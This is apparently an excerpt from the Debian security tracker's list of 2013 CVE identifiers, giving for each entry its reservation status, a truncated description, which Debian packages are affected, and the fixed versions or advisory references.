RESERVED CVE-2013-3014 RESERVED CVE-2013-3013 RESERVED CVE-2013-3012 RESERVED CVE-2013-3011 RESERVED CVE-2013-3010 RESERVED CVE-2013-3009 RESERVED CVE-2013-3008 RESERVED CVE-2013-3007 RESERVED CVE-2013-3006 RESERVED CVE-2013-3005 RESERVED CVE-2013-3004 RESERVED CVE-2013-3003 RESERVED CVE-2013-3002 RESERVED CVE-2013-3001 RESERVED CVE-2013-3000 RESERVED CVE-2013-2999 RESERVED CVE-2013-2998 RESERVED CVE-2013-2997 RESERVED CVE-2013-2996 RESERVED CVE-2013-2995 RESERVED CVE-2013-2994 RESERVED CVE-2013-2993 RESERVED CVE-2013-2992 RESERVED CVE-2013-2991 RESERVED CVE-2013-2990 RESERVED CVE-2013-2989 RESERVED CVE-2013-2988 RESERVED CVE-2013-2987 RESERVED CVE-2013-2986 RESERVED CVE-2013-2985 RESERVED CVE-2013-2984 RESERVED CVE-2013-2983 RESERVED CVE-2013-2982 RESERVED CVE-2013-2981 RESERVED CVE-2013-2980 RESERVED CVE-2013-2979 RESERVED CVE-2013-2978 RESERVED CVE-2013-2977 (Integer overflow in IBM Notes 8.5.x before 8.5.3 FP4 Interim Fix 1 and ...) NOT-FOR-US: IBM Notes CVE-2013-2976 RESERVED CVE-2013-2975 RESERVED CVE-2013-2974 RESERVED CVE-2013-2973 RESERVED CVE-2013-2972 RESERVED CVE-2013-2971 RESERVED CVE-2013-2970 RESERVED CVE-2013-2969 RESERVED CVE-2013-2968 RESERVED CVE-2013-2967 RESERVED CVE-2013-2966 RESERVED CVE-2013-2965 RESERVED CVE-2013-2964 RESERVED CVE-2013-2963 RESERVED CVE-2013-2962 RESERVED CVE-2013-2961 RESERVED CVE-2013-2960 RESERVED CVE-2013-2959 RESERVED CVE-2013-2958 RESERVED CVE-2013-2957 RESERVED CVE-2013-2956 RESERVED CVE-2013-2955 RESERVED CVE-2013-2954 RESERVED CVE-2013-2953 RESERVED CVE-2013-2952 RESERVED CVE-2013-2951 RESERVED CVE-2013-2950 RESERVED CVE-2013-2949 RESERVED CVE-2013-2948 RESERVED CVE-2013-2947 RESERVED CVE-2013-2946 RESERVED CVE-2013-2945 RESERVED CVE-2013-2944 (strongSwan 4.3.5 through 5.0.3, when using the OpenSSL plugin for ...) {DSA-2665-1} - strongswan 4.6.4-7 CVE-2013-2943 RESERVED CVE-2013-2942 RESERVED CVE-2013-2941 RESERVED CVE-2013-2940 RESERVED CVE-2013-2939 RESERVED CVE-2013-2938 RESERVED CVE-2013-2937 RESERVED CVE-2013-2936 RESERVED CVE-2013-2935 RESERVED CVE-2013-2934 RESERVED CVE-2013-2933 RESERVED CVE-2013-2932 RESERVED CVE-2013-2931 RESERVED CVE-2013-2930 RESERVED CVE-2013-2929 RESERVED CVE-2013-2928 RESERVED CVE-2013-2927 RESERVED CVE-2013-2926 RESERVED CVE-2013-2925 RESERVED CVE-2013-2924 RESERVED CVE-2013-2923 RESERVED CVE-2013-2922 RESERVED CVE-2013-2921 RESERVED CVE-2013-2920 RESERVED CVE-2013-2919 RESERVED CVE-2013-2918 RESERVED CVE-2013-2917 RESERVED CVE-2013-2916 RESERVED CVE-2013-2915 RESERVED CVE-2013-2914 RESERVED CVE-2013-2913 RESERVED CVE-2013-2912 RESERVED CVE-2013-2911 RESERVED CVE-2013-2910 RESERVED CVE-2013-2909 RESERVED CVE-2013-2908 RESERVED CVE-2013-2907 RESERVED CVE-2013-2906 RESERVED CVE-2013-2905 RESERVED CVE-2013-2904 RESERVED CVE-2013-2903 RESERVED CVE-2013-2902 RESERVED CVE-2013-2901 RESERVED CVE-2013-2900 RESERVED CVE-2013-2899 RESERVED CVE-2013-2898 RESERVED CVE-2013-2897 RESERVED CVE-2013-2896 RESERVED CVE-2013-2895 RESERVED CVE-2013-2894 RESERVED CVE-2013-2893 RESERVED CVE-2013-2892 RESERVED CVE-2013-2891 RESERVED CVE-2013-2890 RESERVED CVE-2013-2889 RESERVED CVE-2013-2888 RESERVED CVE-2013-2887 RESERVED CVE-2013-2886 RESERVED CVE-2013-2885 RESERVED CVE-2013-2884 RESERVED CVE-2013-2883 RESERVED CVE-2013-2882 RESERVED CVE-2013-2881 RESERVED CVE-2013-2880 RESERVED CVE-2013-2879 RESERVED CVE-2013-2878 RESERVED CVE-2013-2877 RESERVED CVE-2013-2876 RESERVED CVE-2013-2875 RESERVED CVE-2013-2874 RESERVED CVE-2013-2873 RESERVED CVE-2013-2872 RESERVED CVE-2013-2871 RESERVED CVE-2013-2870 RESERVED CVE-2013-2869 RESERVED CVE-2013-2868 RESERVED CVE-2013-2867 RESERVED CVE-2013-2866 RESERVED CVE-2013-2865 RESERVED CVE-2013-2864 RESERVED CVE-2013-2863 RESERVED CVE-2013-2862 RESERVED CVE-2013-2861 RESERVED CVE-2013-2860 RESERVED CVE-2013-2859 RESERVED CVE-2013-2858 RESERVED CVE-2013-2857 RESERVED CVE-2013-2856 RESERVED CVE-2013-2855 RESERVED CVE-2013-2854 RESERVED CVE-2013-2853 RESERVED CVE-2013-2852 RESERVED CVE-2013-2851 RESERVED CVE-2013-2850 RESERVED CVE-2013-2849 RESERVED CVE-2013-2848 RESERVED CVE-2013-2847 RESERVED CVE-2013-2846 RESERVED CVE-2013-2845 RESERVED CVE-2013-2844 RESERVED CVE-2013-2843 RESERVED CVE-2013-2842 RESERVED CVE-2013-2841 RESERVED CVE-2013-2840 RESERVED CVE-2013-2839 RESERVED CVE-2013-2838 RESERVED CVE-2013-2837 RESERVED CVE-2013-2836 RESERVED CVE-2013-2835 (Google Chrome OS before 26.0.1410.57 does not properly enforce origin ...) NOT-FOR-US: Google Chrome OS CVE-2013-2834 (Google Chrome OS before 26.0.1410.57 does not properly enforce origin ...) NOT-FOR-US: Google Chrome OS CVE-2013-2833 (Use-after-free vulnerability in the O3D plug-in in Google Chrome OS ...) NOT-FOR-US: Google Chrome OS CVE-2013-2832 (The Buffer::Set function in core/cross/buffer.cc in the O3D plug-in in ...) NOT-FOR-US: Google Chrome OS CVE-2013-2831 RESERVED CVE-2013-2830 RESERVED CVE-2013-2829 RESERVED CVE-2013-2828 RESERVED CVE-2013-2827 RESERVED CVE-2013-2826 RESERVED CVE-2013-2825 RESERVED CVE-2013-2824 RESERVED CVE-2013-2823 RESERVED CVE-2013-2822 RESERVED CVE-2013-2821 RESERVED CVE-2013-2820 RESERVED CVE-2013-2819 RESERVED CVE-2013-2818 RESERVED CVE-2013-2817 RESERVED CVE-2013-2816 RESERVED CVE-2013-2815 RESERVED CVE-2013-2814 RESERVED CVE-2013-2813 RESERVED CVE-2013-2812 RESERVED CVE-2013-2811 RESERVED CVE-2013-2810 RESERVED CVE-2013-2809 RESERVED CVE-2013-2808 RESERVED CVE-2013-2807 RESERVED CVE-2013-2806 RESERVED CVE-2013-2805 RESERVED CVE-2013-2804 RESERVED CVE-2013-2803 RESERVED CVE-2013-2802 RESERVED CVE-2013-2801 RESERVED CVE-2013-2800 RESERVED CVE-2013-2799 RESERVED CVE-2013-2798 RESERVED CVE-2013-2797 RESERVED CVE-2013-2796 RESERVED CVE-2013-2795 RESERVED CVE-2013-2794 RESERVED CVE-2013-2793 RESERVED CVE-2013-2792 RESERVED CVE-2013-2791 RESERVED CVE-2013-2790 RESERVED CVE-2013-2789 RESERVED CVE-2013-2788 RESERVED CVE-2013-2787 RESERVED CVE-2013-2786 RESERVED CVE-2013-2785 RESERVED CVE-2013-2784 RESERVED CVE-2013-2783 RESERVED CVE-2013-2782 RESERVED CVE-2013-2781 RESERVED CVE-2013-2780 (Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to ...) NOT-FOR-US: Siemens SIMATIC CVE-2013-2779 (Cisco IOS XE 3.4 before 3.4.5S, and 3.5 through 3.7 before 3.7.1S, on ...) NOT-FOR-US: Cisco IOS XE CVE-2013-2778 (Cross-site request forgery (CSRF) vulnerability in ...) NOT-FOR-US: PHP Address Book CVE-2013-2777 (sudo before 1.7.10p5 and 1.8.x before 1.8.6p6, when the tty_tickets ...) {DSA-2642-1} - sudo 1.8.5p2-1+nmu1 (bug #701839) CVE-2013-2776 (sudo 1.3.5 through 1.7.10p5 and 1.8.0 through 1.8.6p6, when running on ...) {DSA-2642-1} - sudo 1.8.5p2-1+nmu1 (bug #701839) CVE-2013-2775 RESERVED CVE-2013-2774 RESERVED CVE-2013-2773 RESERVED CVE-2013-2772 RESERVED CVE-2013-2771 RESERVED CVE-2013-2770 (The installation functionality in the Novell Kanaka component before ...) NOT-FOR-US: Novell Open Enterprise Server (OES) on Mac OS X CVE-2013-2769 RESERVED CVE-2013-2768 RESERVED CVE-2013-2767 (Unspecified vulnerability in Citrix NetScaler Access Gateway ...) NOT-FOR-US: Citrix NetScaler Access Gateway CVE-2013-2766 (Cross-site scripting (XSS) vulnerability in Splunk Web in Splunk 4.3.0 ...) NOT-FOR-US: Splunk CVE-2013-2765 RESERVED CVE-2013-2764 RESERVED CVE-2013-XXXX [imagemagick: null pointer dereference] - imagemagick (low; bug #704901) CVE-2013-2763 (** DISPUTED ** The Schneider Electric M340 PLC modules allow remote ...) NOT-FOR-US: Schneider Electric M340 modules CVE-2013-2762 (The Schneider Electric Magelis XBT HMI controller has a default ...) NOT-FOR-US: Schneider Electric CVE-2013-2761 (The Schneider Electric M340 BMXNOE01xx and BMXP3420xx PLC modules ...) NOT-FOR-US: Schneider Electric CVE-2013-2760 (Buffer overflow in Groovy Media Player 3.2.0 allows remote attackers ...) NOT-FOR-US: Groovy Media Player CVE-2013-2759 RESERVED CVE-2013-2758 RESERVED NOT-FOR-US: CloudStack CVE-2013-2757 RESERVED CVE-2013-2756 RESERVED NOT-FOR-US: CloudStack CVE-2013-2755 RESERVED CVE-2013-2754 RESERVED CVE-2013-2753 RESERVED CVE-2013-2752 RESERVED CVE-2013-2751 RESERVED CVE-2013-2750 RESERVED CVE-2013-2749 RESERVED CVE-2013-2748 RESERVED CVE-2013-2747 RESERVED CVE-2013-2746 RESERVED CVE-2013-2745 RESERVED CVE-2013-2744 (importbuddy.php in the BackupBuddy plugin 2.2.25 for WordPress allows ...) NOT-FOR-US: BackupBuddy plugin for WordPress CVE-2013-2743 (importbuddy.php in the BackupBuddy plugin 1.3.4, 2.1.4, 2.2.25, ...) NOT-FOR-US: BackupBuddy plugin for WordPress CVE-2013-2742 (importbuddy.php in the BackupBuddy plugin 1.3.4, 2.1.4, 2.2.25, ...) NOT-FOR-US: BackupBuddy plugin for WordPress CVE-2013-2741 (importbuddy.php in the BackupBuddy plugin 1.3.4, 2.1.4, 2.2.25, ...) NOT-FOR-US: BackupBuddy plugin for WordPress CVE-2013-2740 RESERVED CVE-2013-2739 RESERVED CVE-2013-2738 RESERVED CVE-2013-2737 (A JavaScript API in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x ...) NOT-FOR-US: Adobe Reader CVE-2013-2736 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-2735 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-2734 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-2733 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x ...) NOT-FOR-US: Adobe Reader CVE-2013-2732 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-2731 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-2730 (Buffer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x ...) NOT-FOR-US: Adobe Reader CVE-2013-2729 (Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x ...) NOT-FOR-US: Adobe Reader CVE-2013-2728 (Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on ...) NOT-FOR-US: Adobe Flash CVE-2013-2727 (Integer overflow in Adobe Reader and Acrobat 9.x before 9.5.5, 10.x ...) NOT-FOR-US: Adobe Reader CVE-2013-2726 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-2725 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-2724 (Stack-based buffer overflow in Adobe Reader and Acrobat 9.x before ...) NOT-FOR-US: Adobe Reader CVE-2013-2723 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-2722 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-2721 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-2720 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-2719 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-2718 (Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and ...) NOT-FOR-US: Adobe Reader CVE-2013-2717 (Multiple unspecified vulnerabilities in the System Management (aka ...) NOT-FOR-US: EMC CVE-2012-6550 (Cross-site scripting (XSS) vulnerability in ZeroClipboard before 1.0.8 ...) - db4o (unimportant) NOTE: in doc package only CVE-2013-2716 (Puppet Labs Puppet Enterprise before 2.8.0 does not use a "randomized ...) NOT-FOR-US: Puppet Labs Puppet Enterprise CVE-2013-2715 (Cross-site scripting (XSS) vulnerability in the admin view in the ...) NOT-FOR-US: Drupal module search_api CVE-2013-2714 RESERVED CVE-2013-2713 RESERVED CVE-2013-2712 RESERVED CVE-2013-2711 RESERVED CVE-2013-2710 RESERVED CVE-2013-2709 (Cross-site request forgery (CSRF) vulnerability in the FourSquare ...) NOT-FOR-US: WordPress plugin FourSquare Checkins CVE-2013-2708 RESERVED CVE-2013-2707 (Cross-site request forgery (CSRF) vulnerability in the Login With Ajax ...) NOT-FOR-US: WordPress plugin CVE-2013-2706 RESERVED CVE-2013-2705 RESERVED CVE-2013-2704 RESERVED CVE-2013-2703 (Cross-site request forgery (CSRF) vulnerability in the Facebook ...) NOT-FOR-US: Facebook Members plugin for WordPres CVE-2013-2702 (Cross-site request forgery (CSRF) vulnerability in the Easy AdSense ...) NOT-FOR-US: Easy AdSense Lite plugin for WordPress CVE-2013-2701 RESERVED CVE-2013-2700 RESERVED CVE-2013-2699 RESERVED CVE-2013-2698 RESERVED CVE-2013-2697 (Cross-site request forgery (CSRF) vulnerability in the ...) NOT-FOR-US: Wordpress plugin Downloadmanager CVE-2013-2696 (Cross-site request forgery (CSRF) vulnerability in the All in One ...) NOT-FOR-US: WordPress plugin All in One Webmaster CVE-2013-2695 RESERVED CVE-2013-2694 RESERVED CVE-2013-2693 RESERVED CVE-2013-2692 RESERVED CVE-2013-2691 RESERVED CVE-2013-2690 (SQL injection vulnerability in index.php in Synchroweb Technology ...) NOT-FOR-US: Synchroweb Technology SynConnect 2.0 CVE-2013-2689 RESERVED CVE-2013-2688 RESERVED CVE-2013-2687 RESERVED CVE-2013-2686 (main/http.c in the HTTP server in Asterisk Open Source 1.8.x before ...) - asterisk 1:1.8.13.1~dfsg-2 (bug #704114) [squeeze] - asterisk (httpd code does not read HTTP POST variables) NOTE: https://issues.asterisk.org/jira/browse/ASTERISK-20967 CVE-2013-2685 (Stack-based buffer overflow in res/res_format_attr_h264.c in Asterisk ...) - asterisk (H264 code not yet present) NOTE: https://issues.asterisk.org/jira/browse/ASTERISK-20901 CVE-2013-2684 RESERVED CVE-2013-2683 RESERVED CVE-2013-2682 RESERVED CVE-2013-2681 RESERVED CVE-2013-2680 RESERVED CVE-2013-2679 RESERVED CVE-2013-2678 RESERVED CVE-2013-2677 RESERVED CVE-2013-2676 RESERVED CVE-2013-2675 RESERVED CVE-2013-2674 RESERVED CVE-2013-2673 RESERVED CVE-2013-2672 RESERVED CVE-2013-2671 RESERVED CVE-2013-2670 RESERVED CVE-2013-2669 RESERVED CVE-2013-2668 RESERVED CVE-2013-2667 RESERVED CVE-2013-2666 RESERVED CVE-2013-2665 RESERVED CVE-2013-2664 RESERVED CVE-2013-2663 RESERVED CVE-2013-2662 RESERVED CVE-2013-2661 RESERVED CVE-2013-2660 RESERVED CVE-2013-2659 RESERVED CVE-2013-2658 RESERVED CVE-2013-2657 RESERVED CVE-2013-2656 RESERVED CVE-2013-2655 RESERVED CVE-2013-2654 RESERVED CVE-2013-2653 RESERVED CVE-2013-2652 RESERVED CVE-2013-2651 RESERVED CVE-2013-2650 RESERVED CVE-2013-2649 RESERVED CVE-2013-2648 RESERVED CVE-2013-2647 RESERVED CVE-2013-2646 RESERVED CVE-2013-2645 RESERVED CVE-2013-2644 RESERVED CVE-2013-2643 RESERVED CVE-2013-2642 RESERVED CVE-2013-2641 RESERVED CVE-2013-2640 (ajax.functions.php in the MailUp plugin before 1.3.2 for WordPress ...) NOT-FOR-US: MailUp plugin for Wordpress CVE-2013-2639 RESERVED CVE-2013-2638 RESERVED CVE-2013-2637 RESERVED CVE-2013-2636 (net/bridge/br_mdb.c in the Linux kernel before 3.8.4 does not ...) - linux (Introduced in 3.8) - linux-2.6 (Introduced in 3.8) CVE-2013-2635 (The rtnl_fill_ifinfo function in net/core/rtnetlink.c in the Linux ...) - linux 3.2.41-2 - linux-2.6 [squeeze] - linux-2.6 (Introduced in 2.6.34) CVE-2013-2634 (net/dcb/dcbnl.c in the Linux kernel before 3.8.4 does not initialize ...) {DSA-2668-1} - linux 3.2.41-2 - linux-2.6 CVE-2013-2633 (Piwik before 1.11 accepts input from a POST request instead of a GET ...) - piwik (bug #506933) CVE-2013-2632 (Google V8 before 3.17.13, as used in Google Chrome before 27.0.1444.3, ...) - libv8 CVE-2013-2631 RESERVED CVE-2013-2630 RESERVED CVE-2013-2629 RESERVED CVE-2013-2628 RESERVED CVE-2013-2627 RESERVED CVE-2013-2626 RESERVED CVE-2013-2625 RESERVED - otrs2 3.1.7+dfsg1-8 NOTE: http://www.otrs.com/en/open-source/community-news/security-advisories/security-advisory-2013-01/ CVE-2013-2624 RESERVED CVE-2013-2623 RESERVED CVE-2013-2622 RESERVED CVE-2013-2621 RESERVED CVE-2013-2620 RESERVED CVE-2013-2619 RESERVED CVE-2013-2618 RESERVED CVE-2013-2617 (lib/curl.rb in the Curl Gem for Ruby allows remote attackers to ...) NOT-FOR-US: Ruby Curl gem CVE-2013-2616 (lib/mini_magick.rb in the MiniMagick Gem 1.3.1 for Ruby allows remote ...) NOT-FOR-US: Ruby MiniMagick gem CVE-2013-2615 (lib/entry_controller.rb in the fastreader Gem 1.0.8 for Ruby allows ...) NOT-FOR-US: Ruby fastreader gem CVE-2013-2614 RESERVED CVE-2013-2613 RESERVED CVE-2013-2612 RESERVED CVE-2013-2611 RESERVED CVE-2013-2610 RESERVED CVE-2013-2609 RESERVED CVE-2013-2608 RESERVED CVE-2013-2607 RESERVED CVE-2013-2606 RESERVED CVE-2013-2605 RESERVED CVE-2013-2604 RESERVED CVE-2013-2603 RESERVED CVE-2013-2602 RESERVED CVE-2013-2601 RESERVED CVE-2013-2600 RESERVED CVE-2013-2599 RESERVED CVE-2013-2598 RESERVED CVE-2013-2597 RESERVED CVE-2013-2596 (Integer overflow in the fb_mmap function in drivers/video/fbmem.c in ...) TODO: check implications for our linux kernels NOTE: the issue comes from fbmem code from linux mainline, the exploit was just targetting motorola NOTE: phones that ship code that is based on the original linux code, but both are affected. CVE-2013-2595 RESERVED NOT-FOR-US: Qualcomm MSM Camera driver CVE-2013-2594 RESERVED CVE-2013-2593 RESERVED CVE-2013-2592 RESERVED CVE-2013-2591 RESERVED CVE-2013-2590 RESERVED CVE-2013-2589 RESERVED CVE-2013-2588 RESERVED CVE-2013-2587 RESERVED CVE-2013-2586 RESERVED CVE-2013-2585 RESERVED CVE-2013-2584 RESERVED CVE-2013-2583 RESERVED CVE-2013-2582 RESERVED CVE-2013-2581 RESERVED CVE-2013-2580 RESERVED CVE-2013-2579 RESERVED CVE-2013-2578 RESERVED CVE-2013-2577 RESERVED CVE-2013-2576 RESERVED CVE-2013-2575 RESERVED CVE-2013-2574 RESERVED CVE-2013-2573 RESERVED CVE-2013-2572 RESERVED CVE-2013-2571 RESERVED CVE-2013-2570 RESERVED CVE-2013-2569 RESERVED CVE-2013-2568 RESERVED CVE-2013-2567 RESERVED CVE-2013-2566 (The RC4 algorithm, as used in the TLS protocol and SSL protocol, has ...) NOTE: Generic protocol flaw in RC4 CVE-2012-6549 (The isofs_export_encode_fh function in fs/isofs/export.c in the Linux ...) {DSA-2668-1} - linux 3.2.41-1 (low) - linux-2.6 (low) CVE-2012-6548 (The udf_encode_fh function in fs/udf/namei.c in the Linux kernel ...) {DSA-2668-1} - linux 3.2.41-1 (low) - linux-2.6 (low) CVE-2012-6547 (The __tun_chr_ioctl function in drivers/net/tun.c in the Linux kernel ...) - linux 3.2.29-1 (low) - linux-2.6 (low) CVE-2012-6546 (The ATM implementation in the Linux kernel before 3.6 does not ...) {DSA-2668-1} - linux 3.2.30-1 (low) - linux-2.6 (low) CVE-2012-6545 (The Bluetooth RFCOMM implementation in the Linux kernel before 3.6 ...) {DSA-2668-1} - linux 3.2.30-1 (low) - linux-2.6 (low) CVE-2012-6544 (The Bluetooth protocol stack in the Linux kernel before 3.6 does not ...) {DSA-2668-1} - linux 3.2.30-1 (low) - linux-2.6 (low) CVE-2012-6543 (The l2tp_ip6_getname function in net/l2tp/l2tp_ip6.c in the Linux ...) - linux (Affected code introduced in 3.5) - linux-2.6 (Affected code introduced in 3.5) CVE-2012-6542 (The llc_ui_getname function in net/llc/af_llc.c in the Linux kernel ...) {DSA-2668-1} - linux 3.2.30-1 (low) - linux-2.6 (low) CVE-2012-6541 (The ccid3_hc_tx_getsockopt function in net/dccp/ccids/ccid3.c in the ...) - linux 3.2.30-1 (low) - linux-2.6 (low) [squeeze] - linux-2.6 (Introduced in 2.6.37) CVE-2012-6540 (The do_ip_vs_get_ctl function in net/netfilter/ipvs/ip_vs_ctl.c in the ...) {DSA-2668-1} - linux 3.2.30-1 (low) - linux-2.6 (low) CVE-2012-6539 (The dev_ifconf function in net/socket.c in the Linux kernel before 3.6 ...) {DSA-2668-1} - linux 3.2.30-1 (low) - linux-2.6 (low) CVE-2012-6538 (The copy_to_user_auth function in net/xfrm/xfrm_user.c in the Linux ...) - linux 3.2.32-1 (low) - linux-2.6 (low) [squeeze] - linux-2.6 (Introduced in 2.6.33) CVE-2012-6537 (net/xfrm/xfrm_user.c in the Linux kernel before 3.6 does not ...) {DSA-2668-1} - linux 3.2.32-1 (low) - linux-2.6 (low) CVE-2012-6536 (net/xfrm/xfrm_user.c in the Linux kernel before 3.6 does not verify ...) - linux 3.2.32-1 (low) - linux-2.6 (low) [squeeze] - linux-2.6 (Introduced in 2.6.39) CVE-2012-XXXX [null pointer dereference] - chromium-browser 21.0.1180.57~r148591-1 NOTE: http://seclists.org/fulldisclosure/2013/Mar/134 NOTE: full disclosure post dosn't make it clear if a CVE was assigned for this or not, but it is fixed in the above version CVE-2013-2565 RESERVED NOT-FOR-US: Mambo CMS CVE-2013-2564 RESERVED NOT-FOR-US: Mambo CMS CVE-2013-2563 RESERVED NOT-FOR-US: Mambo CMS CVE-2013-2562 RESERVED NOT-FOR-US: Mambo CMS CVE-2013-2561 [improper use of files in /tmp] RESERVED - ibutils (low; bug #704063) [squeeze] - ibutils (Minor issue) [wheezy] - ibutils (Minor issue) CVE-2013-2560 (Directory traversal vulnerability in the web interface on Foscam ...) NOT-FOR-US: Foscam CVE-2013-2559 RESERVED CVE-2013-2558 (Unspecified vulnerability in Microsoft Windows 8 allows remote ...) NOT-FOR-US: Windows 8 CVE-2013-2557 (The sandbox protection mechanism in Microsoft Internet Explorer 9 ...) NOT-FOR-US: Internet Explorer CVE-2013-2556 (Unspecified vulnerability in Microsoft Windows 7 allows attackers to ...) NOT-FOR-US: Windows 7 CVE-2013-2555 (Integer overflow in Adobe Flash Player before 10.3.183.75 and 11.x ...) NOT-FOR-US: Adobe Flash plugin CVE-2013-2554 (Unspecified vulnerability in Microsoft Windows 7 allows attackers to ...) NOT-FOR-US: Windows 7 CVE-2013-2553 (Unspecified vulnerability in the kernel in Microsoft Windows 7 allows ...) NOT-FOR-US: Windows 7 CVE-2013-2552 (Unspecified vulnerability in Microsoft Internet Explorer 10 on Windows ...) NOT-FOR-US: Internet Explorer CVE-2013-2551 (Use-after-free vulnerability in Microsoft Internet Explorer 6 through ...) NOT-FOR-US: Internet Explorer CVE-2013-2550 (Unspecified vulnerability in Adobe Reader 11.0.02 allows attackers to ...) NOT-FOR-US: Adobe Reader CVE-2013-2549 (Unspecified vulnerability in Adobe Reader 11.0.02 allows remote ...) NOT-FOR-US: Adobe Reader CVE-2013-2548 (The crypto_report_one function in crypto/crypto_user.c in the report ...) - linux 3.2.41-1 (low) - linux-2.6 (Introduced in 3.2) CVE-2013-2547 (The crypto_report_one function in crypto/crypto_user.c in the report ...) - linux 3.2.41-1 (low) - linux-2.6 (Introduced in 3.2) CVE-2013-2546 (The report API in the crypto user configuration API in the Linux ...) - linux 3.2.41-1 (low) - linux-2.6 (Introduced in 3.2) CVE-2013-2545 RESERVED CVE-2013-2544 RESERVED CVE-2013-2543 RESERVED CVE-2013-2542 RESERVED CVE-2013-2541 RESERVED CVE-2013-2540 RESERVED CVE-2013-2539 RESERVED CVE-2013-2538 RESERVED CVE-2013-2537 RESERVED CVE-2013-2536 RESERVED CVE-2013-2535 RESERVED CVE-2013-2534 RESERVED CVE-2013-2533 RESERVED CVE-2013-2532 RESERVED CVE-2013-2531 RESERVED CVE-2013-2530 RESERVED CVE-2013-2529 RESERVED CVE-2013-2528 RESERVED CVE-2013-2527 RESERVED CVE-2013-2526 RESERVED CVE-2013-2525 RESERVED CVE-2013-2524 RESERVED CVE-2013-2523 RESERVED CVE-2013-2522 RESERVED CVE-2013-2521 RESERVED CVE-2013-2520 RESERVED CVE-2013-2519 RESERVED CVE-2013-2518 RESERVED CVE-2013-2517 RESERVED CVE-2013-2516 RESERVED CVE-2013-2515 RESERVED CVE-2013-2514 RESERVED CVE-2013-2513 RESERVED CVE-2013-2512 RESERVED CVE-2013-2511 RESERVED CVE-2013-2510 RESERVED CVE-2013-2509 RESERVED CVE-2013-2508 RESERVED CVE-2013-2507 RESERVED CVE-2013-2506 (app/models/spree/user.rb in spree_auth_devise in Spree 1.1.x before ...) NOT-FOR-US: Spree CVE-2012-6535 RESERVED CVE-2013-2505 RESERVED CVE-2013-2504 RESERVED CVE-2013-2503 (Privoxy before 3.0.21 does not properly handle Proxy-Authenticate and ...) - privoxy (low; bug #702896) [wheezy] - privoxy (Minor issue) [squeeze] - privoxy (Minor issue) NOTE: http://blog.c22.cc/2013/03/11/privoxy-proxy-authentication-credential-exposure-cve-2013-2503/ NOTE: http://ijbswa.cvs.sourceforge.net/viewvc/ijbswa/current/ChangeLog?revision=1.188&view=markup CVE-2013-2502 RESERVED CVE-2013-2501 (Cross-site scripting (XSS) vulnerability in the Terillion Reviews ...) NOT-FOR-US: Terillion Reviews plugin for Wordpress CVE-2013-2500 RESERVED CVE-2013-2499 RESERVED CVE-2013-2498 RESERVED CVE-2013-2497 RESERVED CVE-2013-2496 (The msrle_decode_8_16_24_32 function in msrledec.c in libavcodec in ...) - libav 6:0.8.6-1 (bug #703200) - ffmpeg CVE-2013-2495 (The iff_read_header function in iff.c in libavformat in FFmpeg through ...) - libav 6:0.8.6-1 (bug #703200) - ffmpeg CVE-2013-2494 (libdns in ISC DHCP 4.2.x before 4.2.5-P1 allows remote name servers to ...) - isc-dhcp 4.2.4-6 (low; bug #704426) [wheezy] - isc-dhcp (Minor issue) [squeeze] - isc-dhcp (Only affects 4.2.x) CVE-2013-2493 (The Hook_Terminate function in chrome_frame/protocol_sink_wrap.cc in ...) NOT-FOR-US: Google Chrome Frame plugin for Internet Explorer CVE-2013-2492 (Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before ...) {DSA-2648-1 DSA-2647-1} - firebird2.1 (bug #702735) - firebird2.5 2.5.2~svn+54698.ds4-2 (bug #702736) NOTE: http://tracker.firebirdsql.org/browse/CORE-4058 CVE-2013-2491 RESERVED CVE-2013-2490 RESERVED CVE-2013-2489 RESERVED CVE-2013-2488 (The DTLS dissector in Wireshark 1.6.x before 1.6.14 and 1.8.x before ...) {DSA-2644-1} - wireshark 1.8.2-5 [wheezy] - wireshark 1.8.2-5wheezy1 NOTE: http://www.wireshark.org/security/wnpa-sec-2013-22.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8380 NOTE: Versions affected: 1.8.0 to 1.8.X, 1.6.0 to 1.6.X CVE-2013-2487 (epan/dissectors/packet-reload.c in the REsource LOcation And Discovery ...) - wireshark 1.8.6-1 (unimportant) [squeeze] - wireshark (only 1.8.x series) NOTE: http://www.wireshark.org/security/wnpa-sec-2013-21.html NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8364 NOTE: Versions affected: 1.8.0 to 1.8.5 NOTE: Not suitable for code injection CVE-2013-2486 (The dissect_diagnosticrequest function in ...) - wireshark 1.8.6-1 (unimportant) [squeeze] - wireshark (only 1.8.x series) NOTE: http://www.wireshark.org/security/wnpa-sec-2013-21.html NOTE: 